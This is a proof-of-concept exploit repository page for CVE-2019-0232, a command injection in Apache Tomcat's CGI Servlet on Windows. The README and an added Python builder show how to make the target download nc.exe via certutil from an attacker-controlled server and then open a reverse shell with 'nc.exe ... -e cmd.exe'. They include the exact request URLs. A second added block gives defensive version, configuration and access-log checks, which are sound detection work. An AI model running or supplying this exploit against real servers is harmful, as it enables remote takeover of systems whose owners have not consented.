
CVE-2019-0232 PoC — Apache Tomcat OS command injection vulnerability

Associated Vulnerability
Title: Apache Tomcat OS command injection vulnerability (CVE-2019-0232)
Description: When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disabled by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog (https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html) and this archived MSDN blog (https://web.archive.org/web/20161228144344/https://blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/).
Description
This is revised and enhanced exploit code for CVE-2019-0232.
Readme
# **Exploit for Apache Tomcat CVE-2019-0232**

This script exploits **CVE-2019-0232**, an OS command injection in the CGI Servlet of Apache Tomcat on Windows. When `enableCmdLineArguments` is enabled, the servlet splits the request's query string on `+`, URL-decodes each piece and passes the pieces to the CGI script as command-line arguments. Because of how the JRE builds the Windows command line, a `&` inside an argument reaches `cmd.exe` unneutralised, and `cmd.exe` treats it as a command separator, so anything after it runs as a separate command. The CGI script this PoC targets is a batch file named `ism.bat`; the bug is not in that file, any `.bat` or `.cmd` script served through the CGI Servlet is usable in the same way. The script uses the injection to stage a reverse shell: it makes the target download `nc.exe` (Netcat) with `certutil`, then runs it to connect back to the attacker.

### **Vulnerability Overview:**
- **CVE ID**: CVE-2019-0232
- **Affected Products**: Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93, when running on Windows with the CGI Servlet enabled and `enableCmdLineArguments` set to `true`. Both are off in a stock install; `enableCmdLineArguments` was already off by default in 9.0.x and is off by default in all fixed versions.
- **Description**: 
  - **CVE-2019-0232** is a command injection in the CGI Servlet: query-string tokens become the CGI script's command-line arguments, and the JRE does not neutralise `cmd.exe` metacharacters such as `&` when it assembles the Windows command line. A request such as `/cgi/ism.bat?&nc.exe+...` therefore runs `nc.exe` as its own command after the batch script.
  - This PoC uses the injection to download `nc.exe` onto the target with `certutil` and then to start it as a reverse shell. The download and the shell are the PoC's payload; the vulnerability itself allows any command the Tomcat process can run.

### **Requirements:**
- **Python 3**: The script is designed for Python 3.x.
- **Netcat**: Two pieces are needed: a copy of `nc.exe` served over HTTP from a host the target can reach (the target fetches it with `certutil`), and a Netcat listener on your own machine (for example `nc -lvp 1234`) to receive the reverse shell.
- **Apache Tomcat**: The target must be an affected version (see Vulnerability Overview) running on Windows, with the CGI Servlet mapped, `enableCmdLineArguments` set to `true`, and a batch CGI script reachable at the path the script requests (`/cgi/ism.bat` for this PoC).

### **How It Works:**
1. **Download `nc.exe`**: The script sends a request whose query string, after the servlet splits it on `+`, becomes a `certutil` command that fetches `nc.exe` from your web server into the CGI script's working directory on the target.
2. **Reverse Shell**: A second request of the form `/cgi/ism.bat?&nc.exe+<listener ip>+<listener port>+-e+cmd.exe` starts the downloaded `nc.exe`, which connects back to your Netcat listener with `cmd.exe` attached.
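The following is an added example, not the repository's `CVE-2019-0232.py`. It models how the CGI Servlet turns a query string into arguments (split on `+`, URL-decode each piece, only when the query contains no `=`), approximates how `cmd.exe` then reads a leading `&`, and builds the two requests described in the steps above. The host names and ports match the README's sample output; the `certutil` flags and the `/cgi/ism.bat` path are assumptions.

```python
"""Added example (not the repository's exploit): a model of the argument
handling behind CVE-2019-0232 plus a builder for the two PoC requests.
Host names, ports, the /cgi/ism.bat path and the certutil flags are
assumptions chosen to match the README's sample output."""
from urllib.parse import quote, unquote

# cmd.exe operators that the JRE does not neutralise when it builds the
# Windows command line for a .bat/.cmd CGI script.
CMD_METACHARS = set("&|<>^")


def cgi_argv(query: str) -> list[str]:
    """Model of CGIServlet with enableCmdLineArguments=true: a query string
    with no '=' is split on '+' (empty pieces dropped) and each piece is
    URL-decoded into one command-line argument. A query string containing
    '=' is treated as form data and yields no arguments."""
    if not query or "=" in query:
        return []
    return [unquote(piece) for piece in query.split("+") if piece]


def injected_commands(argv: list[str]) -> list[str]:
    """Approximate cmd.exe's reading of the argument string: '&' separates
    commands, so everything after the first '&' runs on its own. Quoting and
    '^' escaping are deliberately ignored in this model."""
    line = " ".join(argv)
    if "&" not in line:
        return []
    return [part.strip() for part in line.split("&")[1:] if part.strip()]


def cgi_payload_url(base: str, script: str, command: list[str]) -> str:
    """Encode a command as the query string the servlet turns back into
    arguments: spaces become '+', and the leading '&' makes cmd.exe run the
    command after the (argument-less) batch script. A '+' inside a token is
    percent-encoded so it is not taken as a separator."""
    tokens = [quote(tok, safe="/:.-_") for tok in command]
    return f"{base}{script}?&" + "+".join(tokens)


def reverse_shell_urls(target, target_port, server_ip, server_port,
                       lhost, lport, script="/cgi/ism.bat"):
    """The two requests from 'How It Works': stage nc.exe with certutil,
    then run it as a reverse shell. The certutil flags are an assumption."""
    base = f"http://{target}:{target_port}"
    stage = ["certutil", "-urlcache", "-split", "-f",
             f"http://{server_ip}:{server_port}/nc.exe", "nc.exe"]
    shell = ["nc.exe", lhost, str(lport), "-e", "cmd.exe"]
    return cgi_payload_url(base, script, stage), cgi_payload_url(base, script, shell)


if __name__ == "__main__":
    urls = reverse_shell_urls("192.168.1.10", 8080, "192.168.1.100", 80,
                              "192.168.1.100", 1234)
    for url in urls:
        argv = cgi_argv(url.split("?", 1)[1])
        print(url)
        print("  servlet argv :", argv)
        print("  cmd.exe runs :", injected_commands(argv))
```

Running the block prints each URL together with the argument list the servlet would build and the command `cmd.exe` would execute; the second URL is byte-for-byte the one shown in the README's example output. The model is intentionally conservative: it does not emulate `cmd.exe` quoting or `^` escapes, so it under-reports rather than over-reports what an attacker could run.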

### **Usage:**

#### 1. Clone the repository:
```bash
git clone https://github.com/Dharan10/CVE-2019-0232.git
cd CVE-2019-0232
```
#### 2. Edit the script or run it with user inputs:
```bash
python3 exploit.py
```
#### 3. You will be prompted to enter the following details:
- **Target Host**: The IP address of the Apache Tomcat server to exploit.
- **Target Port**: The port of the target server (default: 8080).
- **Server IP**: The IP address of the server hosting `nc.exe`.
- **Server Port**: The port number where `nc.exe` is hosted (default: 80).
- **Netcat Listener IP**: Your IP address that will receive the reverse shell.
- **Netcat Listener Port**: The port on which you are listening for the reverse shell.
### Example:
```bash
[*] Sending payload to download nc.exe...
[+] URL1 Response: 200
[*] Sending payload to execute reverse shell...
[+] URL2 Response: 200
[*] Reverse shell payload URL: http://192.168.1.10:8080/cgi/ism.bat?&nc.exe+192.168.1.100+1234+-e+cmd.exe
```
Once executed successfully, you should have a reverse shell connection back to your Netcat listener.
### Disclaimer:
This script is intended for educational purposes only. Do not use it for malicious activities. Always obtain proper authorization before attempting any penetration testing or security auditing. Misuse of this script could result in legal consequences.

### Important Notes:
- Confirm the target is actually exploitable before running the script: it must be one of the affected Tomcat versions listed above, running on Windows, with the CGI Servlet mapped, `enableCmdLineArguments` set to `true`, and a batch CGI script at the requested path (`/cgi/ism.bat` for this PoC). Versions later than those listed disable `enableCmdLineArguments` by default, so the request simply returns without running anything.
- The script itself needs no special privileges on your machine. On the target, the injected commands run as the Tomcat process, so the reverse shell has exactly the rights of that service account, and `certutil` must be able to write `nc.exe` into the CGI script's working directory (the directory containing `ism.bat`).
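The following is an added example, not part of the repository, covering the checks the notes above ask for from the other side of the wire: a version test against the ranges in the advisory, a `conf/web.xml` check for a CGI Servlet definition with `enableCmdLineArguments` on (with a hardened copy of the same fragment for comparison), and a detection that scans access-log lines for batch-script requests whose query string would become arguments containing `cmd.exe` operators. The `web.xml` fragment and the log lines are constructed samples; the `/cgi/*` mapping is an assumption taken from the README's URL. Whether the host is Windows is a separate precondition the code does not check.

```python
"""Added example (not the repository's code): pre-flight checks and log
detection for CVE-2019-0232. Version ranges follow the advisory text; the
web.xml fragment and log lines below are constructed samples."""
import re
import xml.etree.ElementTree as ET
from urllib.parse import unquote

# Inclusive affected ranges from the advisory; 9.0.0.Mx milestones fold into 9.0.0.
AFFECTED = [((7, 0, 0), (7, 0, 93)), ((8, 5, 0), (8, 5, 39)), ((9, 0, 0), (9, 0, 17))]
CMD_METACHARS = set("&|<>^")
LOG_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<path>[^ ?"]+)(?:\?(?P<query>[^ "]*))? HTTP/')


def version_tuple(version: str) -> tuple:
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unrecognised Tomcat version: {version!r}")
    return tuple(int(x) for x in m.groups())


def version_affected(version: str) -> bool:
    v = version_tuple(version)
    return any(lo <= v <= hi for lo, hi in AFFECTED)


def _local(tag: str) -> str:
    """Strip the XML namespace so the check works with or without xmlns."""
    return tag.rsplit("}", 1)[-1]


def cgi_cmdline_args_enabled(web_xml: str, version: str) -> bool:
    """True if web.xml defines org.apache.catalina.servlets.CGIServlet with
    enableCmdLineArguments effectively on. If the init-param is absent, the
    pre-fix default applies: on for affected 7.0.x/8.5.x, off for 9.0.x."""
    root = ET.fromstring(web_xml)
    for servlet in root.iter():
        if _local(servlet.tag) != "servlet":
            continue
        cls = next((e.text or "" for e in servlet if _local(e.tag) == "servlet-class"), "")
        if cls.strip() != "org.apache.catalina.servlets.CGIServlet":
            continue
        for param in servlet:
            if _local(param.tag) != "init-param":
                continue
            fields = {_local(c.tag): (c.text or "").strip() for c in param}
            if fields.get("param-name") == "enableCmdLineArguments":
                return fields.get("param-value", "").lower() == "true"
        return version_affected(version) and version_tuple(version) < (9, 0, 0)
    return False  # no CGI servlet defined at all


def exploitable(version: str, web_xml: str) -> bool:
    return version_affected(version) and cgi_cmdline_args_enabled(web_xml, version)


def suspicious_cgi_requests(log_lines) -> list:
    """Flag requests to .bat/.cmd scripts whose query string would be turned
    into command-line arguments containing a cmd.exe operator."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        path, query = m.group("path"), m.group("query") or ""
        if not path.lower().endswith((".bat", ".cmd")) or "=" in query:
            continue
        argv = [unquote(p) for p in query.split("+") if p]
        if any(CMD_METACHARS & set(arg) for arg in argv):
            hits.append((path, argv))
    return hits


# Constructed web.xml fragment: CGI servlet enabled the way the PoC needs it.
SAMPLE_WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="4.0">
  <servlet>
    <servlet-name>cgi</servlet-name>
    <servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
    <init-param><param-name>cgiPathPrefix</param-name><param-value>WEB-INF/cgi</param-value></init-param>
    <init-param><param-name>enableCmdLineArguments</param-name><param-value>true</param-value></init-param>
  </servlet>
  <servlet-mapping><servlet-name>cgi</servlet-name><url-pattern>/cgi/*</url-pattern></servlet-mapping>
</web-app>
"""
# Hardened copy: same servlet, command-line arguments switched off.
HARDENED_WEB_XML = SAMPLE_WEB_XML.replace(">true<", ">false<")

# Constructed access-log lines: the two PoC requests, a benign CGI call, a non-CGI request.
SAMPLE_LOG = [
    '192.168.1.100 - - [10/Apr/2019:12:00:01 +0000] "GET /cgi/ism.bat?&certutil+-urlcache+-split+-f+http://192.168.1.100:80/nc.exe+nc.exe HTTP/1.1" 200 0',
    '192.168.1.100 - - [10/Apr/2019:12:00:02 +0000] "GET /cgi/ism.bat?&nc.exe+192.168.1.100+1234+-e+cmd.exe HTTP/1.1" 200 0',
    '10.0.0.5 - - [10/Apr/2019:12:00:03 +0000] "GET /cgi/ism.bat?report+daily HTTP/1.1" 200 512',
    '10.0.0.6 - - [10/Apr/2019:12:00:04 +0000] "GET /index.jsp?q=a&b=c HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for ver in ("9.0.17", "9.0.19"):
        print(ver, "exploitable:", exploitable(ver, SAMPLE_WEB_XML),
              "/ hardened:", exploitable(ver, HARDENED_WEB_XML))
    for path, argv in suspicious_cgi_requests(SAMPLE_LOG):
        print("ALERT", path, argv)
```

The log check deliberately keys on the file extension and the absence of `=` rather than on a fixed script name, since any batch CGI script is usable, and it decodes each token before looking for operators so that a percent-encoded `%26` is caught as well as a raw `&`.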
#### Author:
Author: A!Z3N(Dharan)
Made with power!
### **License:**

This project is licensed under the **MIT License**. 

However, **use it at your own risk**. This code is provided for **educational purposes only**. By using this code, you agree to take full responsibility for any actions resulting from its use. Misuse or unauthorized use of this exploit may lead to legal consequences. **Always obtain proper authorization** before performing any security testing or penetration testing on any system.

You are free to use, modify, and distribute this code, but **only for ethical purposes**. The author is not responsible for any damage caused by this code. 

**Do not use this exploit without the explicit permission of the target system's owner.**

File Snapshot

```text
[4.0K] /data/pocs/d075c5de4b07b2c7ce8d3433ea918162618dc2e9
├── [2.6K] CVE-2019-0232.py
└── [3.9K] README.md

0 directories, 2 files
```